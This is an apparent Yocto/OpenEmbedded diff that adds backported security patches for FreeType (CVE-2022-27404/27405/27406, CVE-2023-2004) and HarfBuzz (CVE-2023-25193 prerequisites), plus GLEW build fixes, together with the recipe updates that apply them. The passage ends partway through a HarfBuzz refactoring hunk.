1From 53dfdcd8198d2b3201a23c4bad9190519ba918db Mon Sep 17 00:00:00 2001
2From: Werner Lemberg <wl@gnu.org>
3Date: Thu, 17 Mar 2022 19:24:16 +0100
4Subject: [PATCH] [sfnt] Avoid invalid face index.
5
6Fixes #1138.
7
8* src/sfnt/sfobjs.c (sfnt_init_face), src/sfnt/sfwoff2.c (woff2_open_font):
9Check `face_index` before decrementing.
10
11CVE: CVE-2022-27404
12Upstream-Status: Backport [https://gitlab.freedesktop.org/freetype/freetype/-/commit/53dfdcd8198d2b3201a23c4bad9190519ba918db.patch]
13Comment: Removed second hunk as sfwoff2.c file is not part of current v2.10.1 code
14Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
15---
16 src/sfnt/sfobjs.c | 2 +-
17 1 file changed, 1 insertion(+), 1 deletion(-)
18
19diff --git a/src/sfnt/sfobjs.c b/src/sfnt/sfobjs.c
20index f9d4d3858..9771c35df 100644
21--- a/src/sfnt/sfobjs.c
22+++ b/src/sfnt/sfobjs.c
23@@ -566,7 +566,7 @@
24 face_index = FT_ABS( face_instance_index ) & 0xFFFF;
25
26 /* value -(N+1) requests information on index N */
27- if ( face_instance_index < 0 )
28+ if ( face_instance_index < 0 && face_index > 0 )
29 face_index--;
30
31 if ( face_index >= face->ttc_header.count )
32--
33GitLab
diff --git a/meta/recipes-graphics/freetype/freetype/CVE-2022-27405.patch b/meta/recipes-graphics/freetype/freetype/CVE-2022-27405.patch
new file mode 100644
index 0000000000..08fccd5a3b
--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2022-27405.patch
@@ -0,0 +1,38 @@
1From 22a0cccb4d9d002f33c1ba7a4b36812c7d4f46b5 Mon Sep 17 00:00:00 2001
2From: Werner Lemberg <wl@gnu.org>
3Date: Sat, 19 Mar 2022 06:40:17 +0100
4Subject: [PATCH] * src/base/ftobjs.c (ft_open_face_internal): Properly guard
5 `face_index`.
6We must ensure that the cast to `FT_Int` doesn't change the sign.
7Fixes #1139.
8
9CVE: CVE-2022-27405
10Upstream-Status: Backport [https://gitlab.freedesktop.org/freetype/freetype/-/commit/22a0cccb4d9d002f33c1ba7a4b36812c7d4f46b5]
11Comment: No Change in any hunk
12Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
13---
14 src/base/ftobjs.c | 9 +++++++++
15 1 file changed, 9 insertions(+)
16
17diff --git a/src/base/ftobjs.c b/src/base/ftobjs.c
18index 2c0f0e6c9..10952a6c6 100644
19--- a/src/base/ftobjs.c
20+++ b/src/base/ftobjs.c
21@@ -2527,6 +2527,15 @@
22 #endif
23
24
25+ /* only use lower 31 bits together with sign bit */
26+ if ( face_index > 0 )
27+ face_index &= 0x7FFFFFFFL;
28+ else
29+ {
30+ face_index &= 0x7FFFFFFFL;
31+ face_index = -face_index;
32+ }
33+
34 #ifdef FT_DEBUG_LEVEL_TRACE
35 FT_TRACE3(( "FT_Open_Face: " ));
36 if ( face_index < 0 )
37--
38GitLab
diff --git a/meta/recipes-graphics/freetype/freetype/CVE-2022-27406.patch b/meta/recipes-graphics/freetype/freetype/CVE-2022-27406.patch
new file mode 100644
index 0000000000..4b5e629f30
--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2022-27406.patch
@@ -0,0 +1,31 @@
1From 0c2bdb01a2e1d24a3e592377a6d0822856e10df2 Mon Sep 17 00:00:00 2001
2From: Werner Lemberg <wl@gnu.org>
3Date: Sat, 19 Mar 2022 09:37:28 +0100
4Subject: [PATCH] * src/base/ftobjs.c (FT_Request_Size): Guard `face->size`.
5
6Fixes #1140.
7
8CVE: CVE-2022-27406
9Upstream-Status: Backport [https://gitlab.freedesktop.org/freetype/freetype/-/commit/0c2bdb01a2e1d24a3e592377a6d0822856e10df2]
10Comment: No Change in any hunk
11Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
12---
13 src/base/ftobjs.c | 3 +++
14 1 file changed, 3 insertions(+)
15
16diff --git a/src/base/ftobjs.c b/src/base/ftobjs.c
17index 6492a1517..282c9121a 100644
18--- a/src/base/ftobjs.c
19+++ b/src/base/ftobjs.c
20@@ -3409,6 +3409,9 @@
21 if ( !face )
22 return FT_THROW( Invalid_Face_Handle );
23
24+ if ( !face->size )
25+ return FT_THROW( Invalid_Size_Handle );
26+
27 if ( !req || req->width < 0 || req->height < 0 ||
28 req->type >= FT_SIZE_REQUEST_TYPE_MAX )
29 return FT_THROW( Invalid_Argument );
30--
31GitLab
diff --git a/meta/recipes-graphics/freetype/freetype/CVE-2023-2004.patch b/meta/recipes-graphics/freetype/freetype/CVE-2023-2004.patch
new file mode 100644
index 0000000000..800d77579e
--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2023-2004.patch
@@ -0,0 +1,40 @@
1From e6fda039ad638866b7a6a5d046f03278ba1b7611 Mon Sep 17 00:00:00 2001
2From: Werner Lemberg <wl@gnu.org>
3Date: Mon, 14 Nov 2022 19:18:19 +0100
4Subject: [PATCH] * src/truetype/ttgxvar.c (tt_hvadvance_adjust): Integer
5 overflow.
6
7Reported as
8
9 https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50462
10
11Upstream-Status: Backport [https://github.com/freetype/freetype/commit/e6fda039ad638866b7a6a5d046f03278ba1b7611]
12CVE: CVE-2023-2004
13Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
14---
15 src/truetype/ttgxvar.c | 3 ++-
16 1 file changed, 2 insertions(+), 1 deletion(-)
17
18diff --git a/src/truetype/ttgxvar.c b/src/truetype/ttgxvar.c
19index 78d87dc..258d701 100644
20--- a/src/truetype/ttgxvar.c
21+++ b/src/truetype/ttgxvar.c
22@@ -43,6 +43,7 @@
23 #include FT_INTERNAL_DEBUG_H
24 #include FT_CONFIG_CONFIG_H
25 #include FT_INTERNAL_STREAM_H
26+#include <freetype/internal/ftcalc.h>
27 #include FT_INTERNAL_SFNT_H
28 #include FT_TRUETYPE_TAGS_H
29 #include FT_TRUETYPE_IDS_H
30@@ -1065,7 +1066,7 @@
31 delta == 1 ? "" : "s",
32 vertical ? "VVAR" : "HVAR" ));
33
34- *avalue += delta;
35+ *avalue = ADD_INT( *avalue, delta );
36
37 Exit:
38 return error;
39--
402.17.1
diff --git a/meta/recipes-graphics/freetype/freetype_2.10.1.bb b/meta/recipes-graphics/freetype/freetype_2.10.1.bb
index 2d444bbf19..6af744b981 100644
--- a/meta/recipes-graphics/freetype/freetype_2.10.1.bb
+++ b/meta/recipes-graphics/freetype/freetype_2.10.1.bb
@@ -15,6 +15,10 @@ LIC_FILES_CHKSUM = "file://docs/LICENSE.TXT;md5=4af6221506f202774ef74f64932878a1
15SRC_URI = "${SAVANNAH_NONGNU_MIRROR}/${BPN}/${BP}.tar.xz \ 15SRC_URI = "${SAVANNAH_NONGNU_MIRROR}/${BPN}/${BP}.tar.xz \
16 file://use-right-libtool.patch \ 16 file://use-right-libtool.patch \
17 file://0001-sfnt-Fix-heap-buffer-overflow-59308.patch \ 17 file://0001-sfnt-Fix-heap-buffer-overflow-59308.patch \
18 file://CVE-2022-27404.patch \
19 file://CVE-2022-27405.patch \
20 file://CVE-2022-27406.patch \
21 file://CVE-2023-2004.patch \
18 " 22 "
19SRC_URI[md5sum] = "bd42e75127f8431923679480efb5ba8f" 23SRC_URI[md5sum] = "bd42e75127f8431923679480efb5ba8f"
20SRC_URI[sha256sum] = "16dbfa488a21fe827dc27eaf708f42f7aa3bb997d745d31a19781628c36ba26f" 24SRC_URI[sha256sum] = "16dbfa488a21fe827dc27eaf708f42f7aa3bb997d745d31a19781628c36ba26f"
diff --git a/meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch b/meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch
new file mode 100644
index 0000000000..7edcfe8de8
--- /dev/null
+++ b/meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch
@@ -0,0 +1,56 @@
1Upstream-Status: Submitted [https://github.com/nigels-com/glew/pull/311]
2Signed-off-by: Ross Burton <ross.burton@arm.com>
3
4From 0ce0a85597db48a2fca619bd95e34af091e54ae8 Mon Sep 17 00:00:00 2001
5From: Ross Burton <ross.burton@arm.com>
6Date: Thu, 22 Jul 2021 16:31:11 +0100
7Subject: [PATCH] Fix build race in Makefile
8
9The current rule for the binaries is:
10
11glew.bin: glew.lib bin bin/$(GLEWINFO.BIN) bin/$(VISUALINFO.BIN)
12
13In parallel builds, all of those targets happen at the same time. This
14means that 'bin' can happen *after* 'bin/$(GLEWINFO.BIN)', which is a
15problem as the 'bin' target's responsibility is to create the directory
16that the other target writes into.
17
18Solve this by not having a separate 'create directory' target which is
19fundamentally racy, and simply mkdir in each target which writes into it.
20---
21 Makefile | 9 ++++-----
22 1 file changed, 4 insertions(+), 5 deletions(-)
23
24diff --git a/Makefile b/Makefile
25index d0e4614..04af44c 100644
26--- a/Makefile
27+++ b/Makefile
28@@ -171,21 +171,20 @@ VISUALINFO.BIN.OBJ := $(VISUALINFO.BIN.OBJ:.c=.o)
29 # Don't build glewinfo or visualinfo for NaCL, yet.
30
31 ifneq ($(filter nacl%,$(SYSTEM)),)
32-glew.bin: glew.lib bin
33+glew.bin: glew.lib
34 else
35-glew.bin: glew.lib bin bin/$(GLEWINFO.BIN) bin/$(VISUALINFO.BIN)
36+glew.bin: glew.lib bin/$(GLEWINFO.BIN) bin/$(VISUALINFO.BIN)
37 endif
38
39-bin:
40- mkdir bin
41-
42 bin/$(GLEWINFO.BIN): $(GLEWINFO.BIN.OBJ) $(LIB.SHARED.DIR)/$(LIB.SHARED)
43+ @mkdir -p $(dir $@)
44 $(CC) $(CFLAGS) -o $@ $(GLEWINFO.BIN.OBJ) $(BIN.LIBS)
45 ifneq ($(STRIP),)
46 $(STRIP) -x $@
47 endif
48
49 bin/$(VISUALINFO.BIN): $(VISUALINFO.BIN.OBJ) $(LIB.SHARED.DIR)/$(LIB.SHARED)
50+ @mkdir -p $(dir $@)
51 $(CC) $(CFLAGS) -o $@ $(VISUALINFO.BIN.OBJ) $(BIN.LIBS)
52 ifneq ($(STRIP),)
53 $(STRIP) -x $@
54--
552.25.1
56
diff --git a/meta/recipes-graphics/glew/glew/notempdir.patch b/meta/recipes-graphics/glew/glew/notempdir.patch
new file mode 100644
index 0000000000..8d79ce0cdf
--- /dev/null
+++ b/meta/recipes-graphics/glew/glew/notempdir.patch
@@ -0,0 +1,19 @@
1We don't use the dist-* targets and hence DIST_DIR isn't used. The current code
2creates a new temp directory in /tmp/ for every invocation of make. Lets
3not do that.
4
5Upstream-Status: Pending [a revised version would be needed for upstream]
6Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
7
8Index: glew-2.2.0/Makefile
9===================================================================
10--- glew-2.2.0.orig/Makefile
11+++ glew-2.2.0/Makefile
12@@ -56,7 +56,6 @@ DIST_SRC_ZIP ?= $(shell pwd)/$(DIST_NAME
13 DIST_SRC_TGZ ?= $(shell pwd)/$(DIST_NAME).tgz
14 DIST_WIN32 ?= $(shell pwd)/$(DIST_NAME)-win32.zip
15
16-DIST_DIR := $(shell mktemp -d /tmp/glew.XXXXXX)/$(DIST_NAME)
17
18 # To disable stripping of linked binaries either:
19 # - use STRIP= on gmake command-line
diff --git a/meta/recipes-graphics/glew/glew_2.2.0.bb b/meta/recipes-graphics/glew/glew_2.2.0.bb
index 8948444e08..d7a26a3438 100644
--- a/meta/recipes-graphics/glew/glew_2.2.0.bb
+++ b/meta/recipes-graphics/glew/glew_2.2.0.bb
@@ -6,6 +6,8 @@ LICENSE = "MIT"
6LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=2ac251558de685c6b9478d89be3149c2" 6LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=2ac251558de685c6b9478d89be3149c2"
7 7
8SRC_URI = "${SOURCEFORGE_MIRROR}/project/glew/glew/${PV}/glew-${PV}.tgz \ 8SRC_URI = "${SOURCEFORGE_MIRROR}/project/glew/glew/${PV}/glew-${PV}.tgz \
9 file://0001-Fix-build-race-in-Makefile.patch \
10 file://notempdir.patch \
9 file://no-strip.patch" 11 file://no-strip.patch"
10 12
11SRC_URI[md5sum] = "3579164bccaef09e36c0af7f4fd5c7c7" 13SRC_URI[md5sum] = "3579164bccaef09e36c0af7f4fd5c7c7"
diff --git a/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre0.patch b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre0.patch
new file mode 100644
index 0000000000..90d4cfefb4
--- /dev/null
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre0.patch
@@ -0,0 +1,335 @@
1From 3122c2cdc45a964efedad8953a2df67205c3e3a8 Mon Sep 17 00:00:00 2001
2From: Behdad Esfahbod <behdad@behdad.org>
3Date: Sat, 4 Dec 2021 19:50:33 -0800
4Subject: [PATCH] [buffer] Add HB_GLYPH_FLAG_UNSAFE_TO_CONCAT
5
6Fixes https://github.com/harfbuzz/harfbuzz/issues/1463
7Upstream-Status: Backport from [https://github.com/harfbuzz/harfbuzz/commit/3122c2cdc45a964efedad8953a2df67205c3e3a8]
8Comment1: To backport the fix for CVE-2023-25193, add defination for HB_GLYPH_FLAG_UNSAFE_TO_CONCAT. This patch is needed along with CVE-2023-25193-pre1.patch for sucessfull porting.
9Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
10---
11 src/hb-buffer.cc | 10 ++---
12 src/hb-buffer.h | 76 ++++++++++++++++++++++++++++++------
13 src/hb-buffer.hh | 33 ++++++++++------
14 src/hb-ot-layout-gsubgpos.hh | 39 +++++++++++++++---
15 src/hb-ot-shape.cc | 8 +---
16 5 files changed, 124 insertions(+), 42 deletions(-)
17
18diff --git a/src/hb-buffer.cc b/src/hb-buffer.cc
19index 6131c86..bba5eae 100644
20--- a/src/hb-buffer.cc
21+++ b/src/hb-buffer.cc
22@@ -610,14 +610,14 @@ done:
23 }
24
25 void
26-hb_buffer_t::unsafe_to_break_impl (unsigned int start, unsigned int end)
27+hb_buffer_t::unsafe_to_break_impl (unsigned int start, unsigned int end, hb_mask_t mask)
28 {
29 unsigned int cluster = (unsigned int) -1;
30 cluster = _unsafe_to_break_find_min_cluster (info, start, end, cluster);
31- _unsafe_to_break_set_mask (info, start, end, cluster);
32+ _unsafe_to_break_set_mask (info, start, end, cluster, mask);
33 }
34 void
35-hb_buffer_t::unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end)
36+hb_buffer_t::unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end, hb_mask_t mask)
37 {
38 if (!have_output)
39 {
40@@ -631,8 +631,8 @@ hb_buffer_t::unsafe_to_break_from_outbuffer (unsigned int start, unsigned int en
41 unsigned int cluster = (unsigned int) -1;
42 cluster = _unsafe_to_break_find_min_cluster (out_info, start, out_len, cluster);
43 cluster = _unsafe_to_break_find_min_cluster (info, idx, end, cluster);
44- _unsafe_to_break_set_mask (out_info, start, out_len, cluster);
45- _unsafe_to_break_set_mask (info, idx, end, cluster);
46+ _unsafe_to_break_set_mask (out_info, start, out_len, cluster, mask);
47+ _unsafe_to_break_set_mask (info, idx, end, cluster, mask);
48 }
49
50 void
51diff --git a/src/hb-buffer.h b/src/hb-buffer.h
52index d5cb746..42dc92a 100644
53--- a/src/hb-buffer.h
54+++ b/src/hb-buffer.h
55@@ -77,26 +77,76 @@ typedef struct hb_glyph_info_t
56 * @HB_GLYPH_FLAG_UNSAFE_TO_BREAK: Indicates that if input text is broken at the
57 * beginning of the cluster this glyph is part of,
58 * then both sides need to be re-shaped, as the
59- * result might be different. On the flip side,
60- * it means that when this flag is not present,
61- * then it's safe to break the glyph-run at the
62- * beginning of this cluster, and the two sides
63- * represent the exact same result one would get
64- * if breaking input text at the beginning of
65- * this cluster and shaping the two sides
66- * separately. This can be used to optimize
67- * paragraph layout, by avoiding re-shaping
68- * of each line after line-breaking, or limiting
69- * the reshaping to a small piece around the
70- * breaking point only.
71+ * result might be different.
72+ *
73+ * On the flip side, it means that when this
74+ * flag is not present, then it is safe to break
75+ * the glyph-run at the beginning of this
76+ * cluster, and the two sides will represent the
77+ * exact same result one would get if breaking
78+ * input text at the beginning of this cluster
79+ * and shaping the two sides separately.
80+ *
81+ * This can be used to optimize paragraph
82+ * layout, by avoiding re-shaping of each line
83+ * after line-breaking.
84+ *
85+ * @HB_GLYPH_FLAG_UNSAFE_TO_CONCAT: Indicates that if input text is changed on one
86+ * side of the beginning of the cluster this glyph
87+ * is part of, then the shaping results for the
88+ * other side might change.
89+ *
90+ * Note that the absence of this flag will NOT by
91+ * itself mean that it IS safe to concat text.
92+ * Only two pieces of text both of which clear of
93+ * this flag can be concatenated safely.
94+ *
95+ * This can be used to optimize paragraph
96+ * layout, by avoiding re-shaping of each line
97+ * after line-breaking, by limiting the
98+ * reshaping to a small piece around the
99+ * breaking positin only, even if the breaking
100+ * position carries the
101+ * #HB_GLYPH_FLAG_UNSAFE_TO_BREAK or when
102+ * hyphenation or other text transformation
103+ * happens at line-break position, in the following
104+ * way:
105+ *
106+ * 1. Iterate back from the line-break position till
107+ * the the first cluster start position that is
108+ * NOT unsafe-to-concat, 2. shape the segment from
109+ * there till the end of line, 3. check whether the
110+ * resulting glyph-run also is clear of the
111+ * unsafe-to-concat at its start-of-text position;
112+ * if it is, just splice it into place and the line
113+ * is shaped; If not, move on to a position further
114+ * back that is clear of unsafe-to-concat and retry
115+ * from there, and repeat.
116+ *
117+ * At the start of next line a similar algorithm can
118+ * be implemented. A slight complication will arise,
119+ * because while our buffer API has a way to
120+ * return flags for position corresponding to
121+ * start-of-text, there is currently no position
122+ * corresponding to end-of-text. This limitation
123+ * can be alleviated by shaping more text than needed
124+ * and looking for unsafe-to-concat flag within text
125+ * clusters.
126+ *
127+ * The #HB_GLYPH_FLAG_UNSAFE_TO_BREAK flag will
128+ * always imply this flag.
129+ *
130+ * Since: REPLACEME
131+ *
132 * @HB_GLYPH_FLAG_DEFINED: All the currently defined flags.
133 *
134 * Since: 1.5.0
135 */
136 typedef enum { /*< flags >*/
137 HB_GLYPH_FLAG_UNSAFE_TO_BREAK = 0x00000001,
138+ HB_GLYPH_FLAG_UNSAFE_TO_CONCAT = 0x00000002,
139
140- HB_GLYPH_FLAG_DEFINED = 0x00000001 /* OR of all defined flags */
141+ HB_GLYPH_FLAG_DEFINED = 0x00000003 /* OR of all defined flags */
142 } hb_glyph_flags_t;
143
144 HB_EXTERN hb_glyph_flags_t
145diff --git a/src/hb-buffer.hh b/src/hb-buffer.hh
146index b5596d9..beac7b6 100644
147--- a/src/hb-buffer.hh
148+++ b/src/hb-buffer.hh
149@@ -67,8 +67,8 @@ enum hb_buffer_scratch_flags_t {
150 HB_BUFFER_SCRATCH_FLAG_HAS_DEFAULT_IGNORABLES = 0x00000002u,
151 HB_BUFFER_SCRATCH_FLAG_HAS_SPACE_FALLBACK = 0x00000004u,
152 HB_BUFFER_SCRATCH_FLAG_HAS_GPOS_ATTACHMENT = 0x00000008u,
153- HB_BUFFER_SCRATCH_FLAG_HAS_UNSAFE_TO_BREAK = 0x00000010u,
154- HB_BUFFER_SCRATCH_FLAG_HAS_CGJ = 0x00000020u,
155+ HB_BUFFER_SCRATCH_FLAG_HAS_CGJ = 0x00000010u,
156+ HB_BUFFER_SCRATCH_FLAG_HAS_GLYPH_FLAGS = 0x00000020u,
157
158 /* Reserved for complex shapers' internal use. */
159 HB_BUFFER_SCRATCH_FLAG_COMPLEX0 = 0x01000000u,
160@@ -324,8 +324,19 @@ struct hb_buffer_t
161 return;
162 unsafe_to_break_impl (start, end);
163 }
164- HB_INTERNAL void unsafe_to_break_impl (unsigned int start, unsigned int end);
165- HB_INTERNAL void unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end);
166+ void unsafe_to_concat (unsigned int start,
167+ unsigned int end)
168+ {
169+ if (end - start < 2)
170+ return;
171+ unsafe_to_break_impl (start, end, HB_GLYPH_FLAG_UNSAFE_TO_CONCAT);
172+ }
173+ HB_INTERNAL void unsafe_to_break_impl (unsigned int start, unsigned int end,
174+ hb_mask_t mask = HB_GLYPH_FLAG_UNSAFE_TO_BREAK | HB_GLYPH_FLAG_UNSAFE_TO_CONCAT);
175+ HB_INTERNAL void unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end,
176+ hb_mask_t mask = HB_GLYPH_FLAG_UNSAFE_TO_BREAK | HB_GLYPH_FLAG_UNSAFE_TO_CONCAT);
177+ void unsafe_to_concat_from_outbuffer (unsigned int start, unsigned int end)
178+ { unsafe_to_break_from_outbuffer (start, end, HB_GLYPH_FLAG_UNSAFE_TO_CONCAT); }
179
180
181 /* Internal methods */
182@@ -377,12 +388,7 @@ struct hb_buffer_t
183 set_cluster (hb_glyph_info_t &inf, unsigned int cluster, unsigned int mask = 0)
184 {
185 if (inf.cluster != cluster)
186- {
187- if (mask & HB_GLYPH_FLAG_UNSAFE_TO_BREAK)
188- inf.mask |= HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
189- else
190- inf.mask &= ~HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
191- }
192+ inf.mask = (inf.mask & ~HB_GLYPH_FLAG_DEFINED) | (mask & HB_GLYPH_FLAG_DEFINED);
193 inf.cluster = cluster;
194 }
195
196@@ -398,13 +404,14 @@ struct hb_buffer_t
197 void
198 _unsafe_to_break_set_mask (hb_glyph_info_t *infos,
199 unsigned int start, unsigned int end,
200- unsigned int cluster)
201+ unsigned int cluster,
202+ hb_mask_t mask)
203 {
204 for (unsigned int i = start; i < end; i++)
205 if (cluster != infos[i].cluster)
206 {
207- scratch_flags |= HB_BUFFER_SCRATCH_FLAG_HAS_UNSAFE_TO_BREAK;
208- infos[i].mask |= HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
209+ scratch_flags |= HB_BUFFER_SCRATCH_FLAG_HAS_GLYPH_FLAGS;
210+ infos[i].mask |= mask;
211 }
212 }
213
214diff --git a/src/hb-ot-layout-gsubgpos.hh b/src/hb-ot-layout-gsubgpos.hh
215index 579d178..a6ca456 100644
216--- a/src/hb-ot-layout-gsubgpos.hh
217+++ b/src/hb-ot-layout-gsubgpos.hh
218@@ -369,7 +369,7 @@ struct hb_ot_apply_context_t :
219 may_skip (const hb_glyph_info_t &info) const
220 { return matcher.may_skip (c, info); }
221
222- bool next ()
223+ bool next (unsigned *unsafe_to = nullptr)
224 {
225 assert (num_items > 0);
226 while (idx + num_items < end)
227@@ -392,11 +392,17 @@ struct hb_ot_apply_context_t :
228 }
229
230 if (skip == matcher_t::SKIP_NO)
231+ {
232+ if (unsafe_to)
233+ *unsafe_to = idx + 1;
234 return false;
235+ }
236 }
237+ if (unsafe_to)
238+ *unsafe_to = end;
239 return false;
240 }
241- bool prev ()
242+ bool prev (unsigned *unsafe_from = nullptr)
243 {
244 assert (num_items > 0);
245 while (idx > num_items - 1)
246@@ -419,8 +425,14 @@ struct hb_ot_apply_context_t :
247 }
248
249 if (skip == matcher_t::SKIP_NO)
250+ {
251+ if (unsafe_from)
252+ *unsafe_from = hb_max (1u, idx) - 1u;
253 return false;
254+ }
255 }
256+ if (unsafe_from)
257+ *unsafe_from = 0;
258 return false;
259 }
260
261@@ -834,7 +846,12 @@ static inline bool match_input (hb_ot_apply_context_t *c,
262 match_positions[0] = buffer->idx;
263 for (unsigned int i = 1; i < count; i++)
264 {
265- if (!skippy_iter.next ()) return_trace (false);
266+ unsigned unsafe_to;
267+ if (!skippy_iter.next (&unsafe_to))
268+ {
269+ c->buffer->unsafe_to_concat (c->buffer->idx, unsafe_to);
270+ return_trace (false);
271+ }
272
273 match_positions[i] = skippy_iter.idx;
274
275@@ -1022,8 +1039,14 @@ static inline bool match_backtrack (hb_ot_apply_context_t *c,
276 skippy_iter.set_match_func (match_func, match_data, backtrack);
277
278 for (unsigned int i = 0; i < count; i++)
279- if (!skippy_iter.prev ())
280+ {
281+ unsigned unsafe_from;
282+ if (!skippy_iter.prev (&unsafe_from))
283+ {
284+ c->buffer->unsafe_to_concat_from_outbuffer (unsafe_from, c->buffer->idx);
285 return_trace (false);
286+ }
287+ }
288
289 *match_start = skippy_iter.idx;
290
291@@ -1045,8 +1068,14 @@ static inline bool match_lookahead (hb_ot_apply_context_t *c,
292 skippy_iter.set_match_func (match_func, match_data, lookahead);
293
294 for (unsigned int i = 0; i < count; i++)
295- if (!skippy_iter.next ())
296+ {
297+ unsigned unsafe_to;
298+ if (!skippy_iter.next (&unsafe_to))
299+ {
300+ c->buffer->unsafe_to_concat (c->buffer->idx + offset, unsafe_to);
301 return_trace (false);
302+ }
303+ }
304
305 *end_index = skippy_iter.idx + 1;
306
307diff --git a/src/hb-ot-shape.cc b/src/hb-ot-shape.cc
308index 5d9a70c..5d10b30 100644
309--- a/src/hb-ot-shape.cc
310+++ b/src/hb-ot-shape.cc
311@@ -1008,7 +1008,7 @@ hb_propagate_flags (hb_buffer_t *buffer)
312 /* Propagate cluster-level glyph flags to be the same on all cluster glyphs.
313 * Simplifies using them. */
314
315- if (!(buffer->scratch_flags & HB_BUFFER_SCRATCH_FLAG_HAS_UNSAFE_TO_BREAK))
316+ if (!(buffer->scratch_flags & HB_BUFFER_SCRATCH_FLAG_HAS_GLYPH_FLAGS))
317 return;
318
319 hb_glyph_info_t *info = buffer->info;
320@@ -1017,11 +1017,7 @@ hb_propagate_flags (hb_buffer_t *buffer)
321 {
322 unsigned int mask = 0;
323 for (unsigned int i = start; i < end; i++)
324- if (info[i].mask & HB_GLYPH_FLAG_UNSAFE_TO_BREAK)
325- {
326- mask = HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
327- break;
328- }
329+ mask |= info[i].mask & HB_GLYPH_FLAG_DEFINED;
330 if (mask)
331 for (unsigned int i = start; i < end; i++)
332 info[i].mask |= mask;
333--
3342.25.1
335
diff --git a/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre1.patch b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre1.patch
new file mode 100644
index 0000000000..4994e0ef68
--- /dev/null
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre1.patch
@@ -0,0 +1,135 @@
1From b29fbd16fa82b82bdf0dcb2f13a63f7dc23cf324 Mon Sep 17 00:00:00 2001
2From: Behdad Esfahbod <behdad@behdad.org>
3Date: Mon, 6 Feb 2023 13:08:52 -0700
4Subject: [PATCH] [gsubgpos] Refactor skippy_iter.match()
5
6Upstream-Status: Backport from [https://github.com/harfbuzz/harfbuzz/commit/b29fbd16fa82b82bdf0dcb2f13a63f7dc23cf324]
7Comment1: To backport the fix for CVE-2023-25193, add defination for MATCH, NOT_MATCH and SKIP.
8Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
9---
10 src/hb-ot-layout-gsubgpos.hh | 94 +++++++++++++++++++++---------------
11 1 file changed, 54 insertions(+), 40 deletions(-)
12
13diff --git a/src/hb-ot-layout-gsubgpos.hh b/src/hb-ot-layout-gsubgpos.hh
14index a6ca456..5a7e564 100644
15--- a/src/hb-ot-layout-gsubgpos.hh
16+++ b/src/hb-ot-layout-gsubgpos.hh
17@@ -369,33 +369,52 @@ struct hb_ot_apply_context_t :
18 may_skip (const hb_glyph_info_t &info) const
19 { return matcher.may_skip (c, info); }
20
21+ enum match_t {
22+ MATCH,
23+ NOT_MATCH,
24+ SKIP
25+ };
26+
27+ match_t match (hb_glyph_info_t &info)
28+ {
29+ matcher_t::may_skip_t skip = matcher.may_skip (c, info);
30+ if (unlikely (skip == matcher_t::SKIP_YES))
31+ return SKIP;
32+
33+ matcher_t::may_match_t match = matcher.may_match (info, match_glyph_data);
34+ if (match == matcher_t::MATCH_YES ||
35+ (match == matcher_t::MATCH_MAYBE &&
36+ skip == matcher_t::SKIP_NO))
37+ return MATCH;
38+
39+ if (skip == matcher_t::SKIP_NO)
40+ return NOT_MATCH;
41+
42+ return SKIP;
43+ }
44+
45 bool next (unsigned *unsafe_to = nullptr)
46 {
47 assert (num_items > 0);
48 while (idx + num_items < end)
49 {
50 idx++;
51- const hb_glyph_info_t &info = c->buffer->info[idx];
52-
53- matcher_t::may_skip_t skip = matcher.may_skip (c, info);
54- if (unlikely (skip == matcher_t::SKIP_YES))
55- continue;
56-
57- matcher_t::may_match_t match = matcher.may_match (info, match_glyph_data);
58- if (match == matcher_t::MATCH_YES ||
59- (match == matcher_t::MATCH_MAYBE &&
60- skip == matcher_t::SKIP_NO))
61- {
62- num_items--;
63- if (match_glyph_data) match_glyph_data++;
64- return true;
65- }
66-
67- if (skip == matcher_t::SKIP_NO)
68+ switch (match (c->buffer->info[idx]))
69 {
70- if (unsafe_to)
71- *unsafe_to = idx + 1;
72- return false;
73+ case MATCH:
74+ {
75+ num_items--;
76+ if (match_glyph_data) match_glyph_data++;
77+ return true;
78+ }
79+ case NOT_MATCH:
80+ {
81+ if (unsafe_to)
82+ *unsafe_to = idx + 1;
83+ return false;
84+ }
85+ case SKIP:
86+ continue;
87 }
88 }
89 if (unsafe_to)
90@@ -408,27 +427,22 @@ struct hb_ot_apply_context_t :
91 while (idx > num_items - 1)
92 {
93 idx--;
94- const hb_glyph_info_t &info = c->buffer->out_info[idx];
95-
96- matcher_t::may_skip_t skip = matcher.may_skip (c, info);
97- if (unlikely (skip == matcher_t::SKIP_YES))
98- continue;
99-
100- matcher_t::may_match_t match = matcher.may_match (info, match_glyph_data);
101- if (match == matcher_t::MATCH_YES ||
102- (match == matcher_t::MATCH_MAYBE &&
103- skip == matcher_t::SKIP_NO))
104+ switch (match (c->buffer->out_info[idx]))
105 {
106- num_items--;
107- if (match_glyph_data) match_glyph_data++;
